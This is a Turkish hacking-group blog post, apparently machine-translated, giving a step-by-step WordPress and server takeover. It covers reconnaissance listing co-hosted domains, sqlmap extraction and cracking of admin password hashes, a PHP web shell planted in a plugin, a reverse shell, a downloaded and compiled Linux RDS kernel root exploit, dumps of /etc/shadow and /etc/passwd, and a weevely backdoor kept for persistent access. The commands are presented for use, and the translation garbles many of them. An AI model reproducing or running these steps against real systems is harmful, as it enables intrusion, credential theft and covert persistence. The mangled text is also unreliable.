Tarih : | at : | Safemode : ON
> root@redhatz:~# Alımlar Başlamıştır. İletişim Bölümünden Alım Yapan Yöneticimize Ulaşabilirsiniz.
> root@redhatz:~# #redhatzopturkey 2016 Yeni Dönemi Artık Aktiftir. BİZİ TERCİH ETTİĞİNİZ İÇİN TEŞEKKÜRLER..



Başlık Yazar Yetki Comt Düzenlenen Kategori

Kolay Yoldan Wordpress Ve Blog Hack ! [2015] WyNe rwxr-xr-x 0 20:20:00

Başlık Kolay Yoldan Wordpress Ve Blog Hack ! [2015]
Yetki rw-r--r--
Yazar WyNe
Zaman 20:20:00
Kategori
Share
Bu sorunun cevabını sadece bir site hack için bir çok yol vardır, çünkü tespit etmek zor olabilir. Bu makalede amacımız, bu teknikleri en hackerlar tarafından kullanılan ve site hedefleme hack göstereceğim!
Hadi bu siteniz olduğunu varsayalım: hack-test.com
Hadi ping bu site almak için sunucu IP:
Şimdi 173.236.138.113 - bu hedef sitemizde barındırılan sunucu IP adresidir.
Diğer siteler aynı sunucuda yer bulmak için, sameip.org kullanacağız:
Aynı IP
26 siteler IP Adresi 173.236.138.113 üzerinde barındırılan
KİMLİĞİ
Etki alanı
Site Linki
1
hijackthisforum.com
2
sportforum.net
3
freeonlinesudoku.net
4
cosplayhell.com
5
videogamenews.org
6
gametour.com
7
qualitypetsitting.net
8
brendanichols.com
9
8ez.com
10
hack-test.com
11
kisax.com
12
paisans.com
13
mghz.com
14
debateful.com
15
jazzygoodtimes.com
16
fruny.com
17
vbum.com
18
wuckie.com
19
force5inc.com
20
virushero.com
21
twincitiesbusinesspeernetwork.com
22
jennieko.com
23
davereedy.com
24
joygarrido.com
25
prismapp.com
26
utiligolf.com
Yirmi altı diğer web siteleri bu sunucuda [173.236.138.113] ev sahipliği yaptı. Birçok hacker sitesi hack için aynı sunucuda diğer tüm siteleri hedef alacaktır. Ama için amaççalışmada, siteniz tek hedef ve bir kenara koyun aynı sunucudaki diğer siteleri hackleme edeceğiz.
Daha fazla ihtiyacımız var bilgi site hakkında:
  1. DNS kayıtlarını (A)NS, TXT, MX ve SOA
  2. Web Sunucu Tipi (ApacheIIS, Tomcat)
  3. Kayıt (etki sahibi olan şirket)
  4. İsim, adres ve telefon
  5. Sitenizi kullanan scriptleri (asp, asp.net, jsp,) cfm php
  6. Sunucu işletim sistemi (Unıx,Linux,Windows,Solaris)
  7. Sunucu portu açık ınternet (80, 443, 21, vb.)
Hadi Başlat sitenizi bulmakta DNS kayıtları. Web sitesi“. kullanırız ” elde bu:

Site DNS kayıtları olduğunu keşfettik:
HACK-TEST.COM DNS KAYITLARI
Kayıt
Yazın
TTL
Öncelik
İçerik
hack-test.com
Bir
4 saat
173.236.138.113 ()
hack-test.com
SOA
4 saat
ns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400
hack-test.com
NS
4 saat
ns1.dreamhost.com
hack-test.com
NS
4 saat
ns3.dreamhost.com
hack-test.com
NS
4 saat
ns2.dreamhost.com
www.hack-test.com
Bir
4 saat
173.236.138.113 ()
Hadi web server türünü belirlemek:
Gördüğünüz gibi, site web server. Apache. Versiyonu daha sonra belirleyeceğiz.
HACK-TEST.COM SİTE BİLGİ

IP: 173.236.138.113
Web Sitesi Durum: aktif
Sunucu Türü: Apache
Alexa Trend/Rank:  1 Ay: 3,213,968 3 Ay: 2,161,753
Ziyaret başına sayfa görüntüleme:  1 Ay: 2.0 3 Ay: 3.7


Şimdi Doman senin bulma zamanı. Kayıt ve adınızı, adresinizi, e-posta ve telefon:
Şimdi kayıt ve diğer hayati var bilgi senin hakkında. 5 R1 sarfınazar adlı Whatweb serin bir aracı kullanarak sitenizde komut (OS türü, web Sunucusu sürüm) türünü bulabiliriz:
Şimdi site ünlü bir php komut dosyası denir kullandığını bulduk WordPresssunucu işletim sistemi web sunucu sürümü olan Fedora Linux ve o, (apache 2.2.15), açık bulalım senin içinde port sunucu.
Bunu yapmak için, nmap kullanacağız:
1 - server üzerinde çalışan hizmetler Bul
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
root@bt:/#- sV hack-test.com nmap
Başlangıç Nmap 5.59BETA1 ( http://nmap.org ) 2011-12-28 06:39 EET en
Nmap hack-test.com (192.168.1.2) tarama raporu
Ana kadar (0.0013 s gecikme süresi).
Gösterilen: 998 filtre bağlantı noktaları
LİMAN DEVLETİ SERVİSİ SÜRÜMÜ
22/tcp ssh kapalı
80/tcp open http Apache ((Fedora)) Apache 2.2.15
MAC Adresi: 00:0 C:: 01:8A:4D 29 (VMware)
Hizmet tespiti yapıldı. Herhangi bir yanlış sonuçlara rapor lütfen http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host) 11.56 saniyede taranan
2 - server OS Bul
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
root@bt:/#- O hack-test.com nmap
Başlangıç Nmap 5.59BETA1 ( http://nmap.org ) 2011-12-28 06:40 EET en
Nmap hack-test.com (192.168.1.2) tarama raporu
Ana kadar (0.00079 s gecikme süresi).
Gösterilen: 998 filtre bağlantı noktaları
LİMAN DEVLETİ SERVİSİ
22/tcp ssh kapalı
80/tcp open http
MAC Adresi: 00:0 C:: 01:8A:4D 29 (VMware)
Cihaz türü: genel amaç
Çalışan: Linux 2.6.X
OS ayrıntıları: Linux 2.6.22 (Fedora Core 6)
Ağ Mesafe: 1 hop
OS tespiti yapıldı. Herhangi bir yanlış sonuçlara rapor lütfen http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host) 7.42 saniye taranan
Bağlantı noktası 80'i açın ve işletim sistemi sadece Linux 2.6.22(Fedora Core 6)
Tüm önemli topladık şimdi bilgi hakkında site, güvenlik açıkları için böyle tarayalım
Sql enjeksiyon - - SLP - Kör sql enjeksiyon, RFI - - CSRF, ve benzeri XSS.
Nikto.pl bilgi toplamak için, belki de, bazı güvenlik açıkları kullanacağız:
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Hedef IP: 192.168.1.2
+ Hedef Hostname: hack-test.com
+ Hedef Port: 80
+ Başlat Zaman: 2011-12-29 06:50:03
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (Fedora)
+ ETag Başlığı sunucusu, inode bulundu: 12748, boyutu: 1475, mtime: 0x4996d177f5c3b
+ Apache/2.2.15 modası geçmiş görünüyor (en azından mevcut. Apache/2.2.17). Apache (son sürüm) 1.3.42 ve 2.0.64 de geçerli.
+ HTTP Yöntemleri izin: GET, POST, SEÇENEKLERİ, İZLEME KAFA
+ - 877 OSVDB: HTTP İZLEME yöntemi, aktif, ana XST karşı savunmasız olduğunu iddia ediyor
+ OSVDB-3268: // simgeler: Dizin dizin oluşturma bulundu.
+ OSVDB-3233: /icons/README: Apache varsayılan dosya buldum.
+ 6448 öğeleri kontrol: 1 hata(s) ve 6 kalem(ler) uzak ana bildirildi
+ Bitiş Saati: 2011-12-29 06:50:37 (34 saniye)
---------------------------------------------------------------------------
+ 1 Ana Makine(ler) test
Ayrıca W3AF kullanacağız. Geriye 5 R1 bu aracı bulabilirsiniz
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
  root@bt:/pentest/web/w3af# ./w3af_gui
Başlangıç w3af, üzerinde çalışan:
Python sürümü:
2.6.5 (r265:79063, Nis 16 2010, 13:57:41)
[GCC 4.4.3]
GTK sürüm: 2.20.1
PyGTK sürümü: 2.17.0
w3af - Uygulama Saldırı ve Denetim Çerçevesi Web
Versiyon: 1.2
Düzeltme: 4605
Yazar: Andres Riancho ve w3af takım.
Biz irademizi Ekle site URL ve tam denetim seçeneğini seçin:
Tarama tamamlanır ve göreceksiniz bir süre sonra,
Sitenizi hassas enjeksiyon, xss ve diğer sql için!
Sql enjeksiyon açığı araştırmak isterim:
Bu savunmasız url ve kedi savunmasız parametre.
Bu güvenlik açığı istismar edelim:
Bu vuln exploitating iş sqlmap kullanımı ve tüm veri tabanı dökümü yüzden başarısız olduğunu bulacağız bilgi kesmek gerekiyor bu site J
-U url ile kullanarak sqlmap
Birkaç saniye görecek sonra
N yazın ve devam etmek için enter tuşuna basın
Siteniz hata tabanlı açıktır gördüğünüz gibi sql enjeksiyon ve mysql veritabanı sürüm 5
Senin sitedeki tüm veritabanlarını bulmak ekleyerek izin ver “-dbs ”
Şimdi 3 veritabanları bulduk
Timsah wordpress ekleyerek veritabanı tablolar “-D wordpress -tablolar ”
Tüm bulacağız wordpress tablolar
“Tüm kullanıcılar bulacağız” tablosu, (admin?) wp_users dökümü istiyoruz bilgi(kullanıcı ve parola hash) ve karma çatlak ve girmeyi deneyin wordpress kontrol paneli ( wp-admin)
” Masa “-T wp_users-sütun ”“wp_users sütunları olacağız
22 sütunlar bulacağız
Biz sadece () user_login ve user_pass ekleyerek sütun timsah sütunlar, döküm, gerek
-C user_login,user_pass-dökümü
Önemli bulacağız bilgi; şimdi bulduk ve geçiş sağlamalarının kullanıcıları
ama bu karma metin parolaları temizlemek için çözmek istiyoruz. Online sitesini kullanacağız “http://www.onlinehashcrack.com/free-hash-reverse.php
Ve kırmak için bu karma 7CBB3252BA6B7E9C422FAC5334D22054
Ve düz metin parola. q1w2e3
Ve kullanıcı adı “GeorgeMiller”
“Eğer bir yönetici ”bu ayrıntıları ile giriş yapacağız
Ve biz!
Tamam, site sunucusuna bazı linux komutları çalıştırmak için php web shell yüklemeyi deneyin. J
Bir eklenti düzenleme yapacağız wordpress “Tekstil ” ya da herhangi bir eklenti sayfasında buldum eklenti.
Ve düzeltmek için seçin
Gerçek eklenti yerine web kabuğu Ekle php edeceğiz. Bunu yaptıktan sonra, “” ve yeni bir php shell gidin güncelleme dosyası vuracağız
Woo, php kabuk çalışır. Şimdi site dosyalarını işleyebilirsiniz, ama sadece sunucunuzun kök almak ve diğer tüm siteleri de kesmek istiyoruz.
"- Geri bağlayın "php tab shell web ve bizim ip"," port "5555"192.168.1.6 bağlantısı geri seçeceğiz
Ama connect koyulmadan önce, biz ilk olarak bunun sebebi kullandığımız port "" saldırganın bizim makinede 5555 dinlemesi olun
Şimdi Bağlan vurdu ve göreceksiniz:
Hadi biraz linux komutları deneyin
?
01
02
03
04
05
06
07
08
09
10
11
kimliği
=48 uıd(apache)=489 gıd(apache) gruplar=489(apache)
özürlü
/var/www/html/Hackademic_RTB1/wp-içerik/plugins
-bir uname
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat May 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
İd komutu ne kullanıcı kimliği, grup bize göstermek için kullanılır.
özürlü komut bize sunucu üzerinde bulunduğumuz yolu göstermek için kullanılır
uname-a komutu bize çekirdek sürümü hakkında bazı bilgileri göstermek için kullanılır

Tamam, şimdi sunucu çekirdek sürümü 2.6.31.5-127 olduğunu biliyorduk.fc12.1686
Bu sürüm için sömürmek için exploit-db.com arama veya daha yeni bir sürüm izin
“Kernel 2.6.31 ”türü olacağız
Sunucunuzdaki hepsini denedim, hiçbiri işe yaramadı, ama sonra yeni bir istismar çalıştım sonra
Tarih
D
Bir
V
Açıklama
Plat.
Yazar
2010-10-19
-
9977
Bu url açtım ve bu bağlantıyı kopyaladım
http://www.exploit-db.com/download/15285
Ve benim bunun sebebi kullandığımız bu komut yapılmış kabuk
?
01
02
03
04
05
06
07
08
09
10
11
12
13
Çözme www.exploit-db.com... 199.27.135.111, 199.27.134.111
Www.exploit-db.com/199.27.135.111/:80... bağlı bağlanıyor.
İstek gönderdi HTTP, yanıt bekliyoruz... 301 Kalıcı olarak Taşındı
Www.exploit-db.com/199.27.135.111/:80... bağlı bağlanıyor.
İstek gönderdi HTTP, yanıt bekliyoruz... 200 TAMAM
Uzunluk: 7154 (7.0 K) [application/] txt
Kaydetme: `ro-ro.c'
0 K...... 100% 29.7=0.2 K s
Wget komutu exploit-db.com istismar getirmek için kullandık ve O ro-ro yeniden adlandırmak için kullanılır.c
Not: linux çekirdeği patlatır çoğunlukla içinde kurtardık c dilinde delopped ediliyor .c uzantısı, sadece görünümü ve kaynak bulacaksınız istismar
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
RECVPORT 5555 define #
SENDPORT 6666 define #
int (int prep_sock port)
{
int s, ret;
yapı sockaddr_in adresi;
socket s = (PF_RDS, SOCK_SEQPACKET, 0);
(s < 0) {
(“[*] açılamadı yuva.\printf”) n;
exit(-1);
}
memset(&adresi, 0, boyutu(Adres));
Tüm yukarıdaki satırlar bu istismar C dili ile yazılmış olduğunu belirtmek
Bizim sunucu üzerinde istismar kurtardık sonra, yazarak elf biçimine derleme olacağız
gcc ro-ro.c-o ro-ro
Ve çalıştırmak bizim yazarak istismar
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
./ro-ro
[ * ] > = 2.6.30 Linux çekirdeği RDS yuva istismar
[*] Dan Rosenberg tarafından
[*] Çözme çekirdek adresleri...
[+] 0xe09f0b20 karar rds_proto_ops
[+] 0xe09db06a karar rds_ioctl
[+] 0xc044e5f1 karar commit_creds
[+] 0xc044e452 için prepare_kernel_cred çözüldü
[*] Üzerine işlev işaretçisi...
[ * ] > = 2.6.30 Linux çekirdeği RDS yuva istismar
[*] Dan Rosenberg tarafından
[*] Çözme çekirdek adresleri...
[+] 0xe09f0b20 karar rds_proto_ops
[+] 0xe09db06a karar rds_ioctl
[+] 0xc044e5f1 karar commit_creds
[+] 0xc044e452 için prepare_kernel_cred çözüldü
[*] Üzerine işlev işaretçisi...
[*] Tetikleme yük...
[*] Geri işlev işaretçisi...
Ve bu tür sonra
Kimliği
Kök biz buluruz J
=0(root) gid=0(root)uıd
Şimdi /etc/shadow dosyası görebiliriz
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
cat /etc/shadow
:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO kök.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
:*:14495:0:99999:7::bin:
:*:14495:0:99999:7::daemon:
:*:14495:0:99999:7::adm:
:*:14495:0:99999:7::lp:
:*:14495:0:99999:7::sync:
:*:14495:0:99999:7::kapatma:
:*:14495:0:99999:7::dur:
:*:14495:0:99999:7::posta:
:*:14495:0:99999:7::yolunu hesaplamak:
:*:14495:0:99999:7::operatör:
:*:14495:0:99999:7::oyunlar:
:*:14495:0:99999:7::gopher:
ftp:*:14495:0:99999:7:::
:*:14495:0:99999:7::kimse:
:!!vcsa:14557::::::
avahi-autoipd:!!:14557::::::
:!!ntp:14557::::::
:!!dbus:14557::::::
:!!rtkit:14557::::::
:!!nscd:14557::::::
:!!tcpdump:14557::::::
:!!avahi:14557::::::
:!!haldaemon:14557::::::
:!!openvpn:14557::::::
:!!apache:14557::::::
:!!saslauth:14557::::::
:!!mailnull:14557::::::
:!!smmsp:14557::::::
:!!smolt:14557::::::
:!!SSH:14557::::::
:!!darbe:14557::::::
:!!sözkonusu:14557::::::
p0wnbox.:$6$rPArLuwe8rM9Avwv$a5coOdUCQQY7NgvTnXaFj2D5SmggRrFsr6tp8g7iatveet37lugjyvhm1myhelcypkijd8yv5olmnuhwbql76/:14981:0:99999:7::takım:
:!!mysql:14981::::::
Ve görünüm /etc/passwd dosyası
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
cat /etc/passwd
root:x:0:0::/root root:/bin/bash
bin:x:1:1::/bin:/sbin/nologin bin
daemon:x:2:2::/sbin:/sbin/nologin daemon
adm:x:3:4::/var:/sbin/adm/nologin adm
lp:x:4:7:://spool var://nologin sbin/lpd lp
sync:x:5:0:sync:/://sync bin sbin
shutdown:x:6:0:shutdown:/://kapatma sbin sbin
halt:x:7:0::/sbin halt:/sbin/halt
mail:x:8:12:://spool var/mail:/sbin/nologin mail
yolunu hesaplamak için:x:10:14:://spool var://nologin sbin/yolunu hesaplamak yolunu hesaplamak
operatör:x:11:0:operator:/://nologin sbin kök
oyun:x:12:100:://oyunlar usr:/sbin/nologin oyunlar
gopher:x:13:30:://gopher var://nologin sbin gopher
://var ftp:x:14:50:FTP Kullanıcı ftp:/sbin/nologin
kimse:x:99:99:Kimse:/:/sbin/nologin
vcsa:x:69:499:sanal bellek:/dev:/sbin sahibi konsolu/nologin
avahi-autoipd:: 499:498:avahi-autoipd x:/var avahi-autoipd:/sbin/lib//nologin
ntp:x:38:38::/://nologin sbin/etc / ntp
dbus:x:81:81:Sistem mesajı bus:/:/sbin/nologin
rtkit:x:498:494::/proc:/sbin/nologin RealtimeKit
nscd:x:28:493:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:: 497:492:avahi-daemon x:/var avahi-daemon:/sbin/Çalıştır//nologin
haldaemon:x:68:491:HAL daemon:/:/sbin/nologin
openvpn:x:496:490::/://nologin sbin openvpn etc/OpenVPN
apache:x:48:489:Apache://var www:/sbin/nologin
saslauth:x:495:488:"Saslauthd kullanıcı":/:/sbin/saslauth boş/var/nologin
mailnull:x:47:487:://spool/://nologin sbin mqueue var
smmsp:x:51:486:://spool/://nologin sbin mqueue var
smolt:x:494:485::/usr/share/:/sbin smolt Smolt/nologin
SSH:x:74:484:Ayrıcalık ayrılmış:/:/sbin/SSH boş/var/nologin SSH
nabız:x:493:483:Sayede Sistem:/var/darbe/://sbin çalıştırmak nologin Daemon
hamilelik:x:42:481:://lib/://nologin sbin sözkonusu var
p0wnbox.Takım:x:500:500:p0wnbox.:/Team home/p0wnbox.://Bin / bash takım
mysql:x:27:480:MySQL Sunucu://var lib://bin/mysql bash
Tüm kullanıcılar kırabiliriz ile şifreleri “karındeşen” aracı.john
Ama bunu yapmayacaktır;/her zaman ziyaret hack yapabiliriz yani bu sunucuya erişim sağlamak istiyoruz J
Parola korumalı olan küçük ve kodlanmış bir php backdoor için weevely kullanımı ve bu php sunucu için arka kapı yükler.
Yapalım
1 - weevely kullanımı seçenekleri :
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@bt:/pentest/backdoors/web/weevely# ./main.py -
Weevely 0.3 - Oluşturmak ve gizli yönetmek PHP arka kapılar.
Telif hakkı (c) 2011-2012 Weevely Geliştiriciler
Kullanımı: main.py [seçenekler]
Seçenekler:
-h, --help bu iletiyi ve çıkış yardımı göster
-g, --arka kapı oluşturmak şifreli kod Oluşturmak gerekir-o-p .
-o, --output=ÇIKIŞ
Oluşturulan backdoor için çıktı dosya adı .
-c KOMUT, --command=KOMUT
Tek bir komut ve bir çıkış gerektirir-u yürütme ve-p
.
-t, --terminal terminal gibi bir oturumu Başlatmak gerekir-u ve-p .
-C KÜME, --=küme KÜME
Küme modu ver maddeleri okumaya başla
formu 'etiketi, url,şifre etiket nerede' dosyası
isteğe bağlı.
-p PAROLA --şifre=ŞİFRE
Şifreli kapı şifre .
-u URL, --url=Uzak backdoor URL .
2 - weevely kullanarak şifre koko ile php bir arka kapı Oluşturmak:
?
1
2
3
4
5
6
7
8
root@bt:/pentest/backdoors/web/weevely# ./main.py -g-o hax.php -p koko
Weevely 0.3 - Oluşturmak ve gizli yönetmek PHP arka kapılar.
Telif hakkı (c) 2011-2012 Weevely Geliştiriciler
+ Backdoor 'dosyası parola ile oluşturulan''. koko hax.php
3 - php web shell kullanarak sunucuya php backdoor Yükle
Ve biz bunu yükle sonra bunu kullanarak bağlayacak
?
01
02
03
04
05
06
07
08
09
10
11
12
root@bt:/pentest/backdoors/web/weevely# ./main.py -t-u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p koko
Weevely 0.3 - Oluşturmak ve gizli yönetmek PHP arka kapılar.
Telif hakkı (c) 2011-2012 Weevely Geliştiriciler
+ Yöntemini kullanarak 'sistem()'.
+ Alınıyor terminal temel ortam değişkenleri .
[apache@HackademicRTB1 //Hackademic_RTB1//html eğer bir içeriği var/www/plugins]
Test hax.php bizim backdoor

Sonuç:

Bu makalede hackerlar tarafından hedef ve web sitesi ve sunucu kesmek için kullanılan bazı teknikler öğrendik. Bu makalede sevdim ve keyif aldım umarım.
Bir sonraki makalede web sitenizin birçok hacker saldırıları, hatta gelişmiş olanlar karşı çok güvenli olur, böylece saldırıları ve daha bu siteden güvenli, biz nasıl öğreneceğiz!

0 yorum:

Yorum Gönder

Makalemizi Okuduysanız Yorum yapabilirsiniz. Küfürlü Yorumlar Silinir Ve Kullanıcı Engellenir. İlginiz İçin Teşekkür Ederiz
#RedHatzOpTurkey

Blogger tarafından desteklenmektedir.